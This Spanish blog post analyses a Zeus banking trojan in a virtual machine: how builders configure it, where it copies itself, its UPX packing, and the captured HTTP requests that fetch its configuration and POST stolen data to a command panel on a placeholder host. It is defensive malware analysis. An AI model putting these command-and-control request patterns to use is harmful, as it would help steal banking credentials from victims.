27 feb 2012

Detrás de un panel de Zeus

Hola!

Muy buenas a todos/as!

Existe un grupo determinado de troyanos que se dedican al Home banking, la banca electrónica. Algunos actúan como Keyloguer, capturan los datos introducidos por el usuario y estos datos son enviados a un panel web, enviados por correo etc..

Otro tipos de troyanos interactúan directamente con la Banca, solicitan los datos al usuario y, además conducen al usuario a la web legítima sin que este se percate de lo ocurrido. Este tipo de infecciones pueden venir a través de correo electrónico o pueden haber páginas webs maliciosas que contengan enlaces a software malicioso.

En este caso hay una máquina virtual con un software creado con un Builder del troyano Zeus.

Estos Builder cargan una configuración al binario, de donde ha de enviar los datos, el nombre del binario.. etc  Este software lo distribuyen mediante diferentes vías y consiguen infectar usuarios que envían los datos donde el criminal tenga un panel web esperando la recogida de información.

En la máquina Windows XP que está infectada con Zeus, el cambio en el sistema de archivos que ha hecho el troyano, lo mas significativo es:

El binario se ha hecho una copia y guardado en la carpeta Datos de Programa, entre otras cosas.

En las conexiones de red, el troyano intentará conectarse con el panel de control que el criminal haya configurado con el Builder y descargarse la configuración.

GET /mm.bin HTTP/1.1Accept: */*Connection: CloseUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)Host: ejemplo.ruCache-Control: no-cache

El troyano se descarga la configuración que analizaremos en otro artículo.

También podemos ver como envía los datos al panel

POST /panel/acc.php HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)Host: ejemplo.ruContent-Length: 387Connection: Keep-AliveCache-Control: no-cache

Ahora extraeremos los datos mediante strings del fichero así podemos ver algo de información del binario.

Aquí tenemos la cabecera de los strings extraídos:

!This program cannot be run in DOS mode.RichUPX0UPX1.rsrc3.03

Se puede ver que el troyano ha sido tratado con un packer estos packer dificultan el análisis por parte de los reversers. UPX es un compresor Open Source, pero en el caso de Malware se usa una versión modificada que dificulta la ingeniería inversa.

Seguramente el Builder lo lleva incorporado.

Hay mas cadenas interesantes que se pueden extraer del binario en cuestión:

XPTPSWKERNEL32.DLLadvapi32.dlluser32.dllLoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegCloseKeyFlashWindowEx$/x76Rg)$\!`7y5Gaz

Vaya, dll propias de sistema que interactúan con el troyano..

En el panel existen estos puertos abiertos:

22/tcp open ssh syn-ack25/tcp open smtp syn-ack80/tcp open http syn-ack111/tcp open rpcbind syn-ack427/tcp open svrloc syn-ack631/tcp open ipp syn-ack1720/tcp filtered H.323/Q.931 no-response2000/tcp filtered cisco-sccp no-response5060/tcp filtered sip no-response

En el siguiente capítulo seguiremos tratando con este troyano, espero que os haya gustado.

Saludos!!

1 comentario: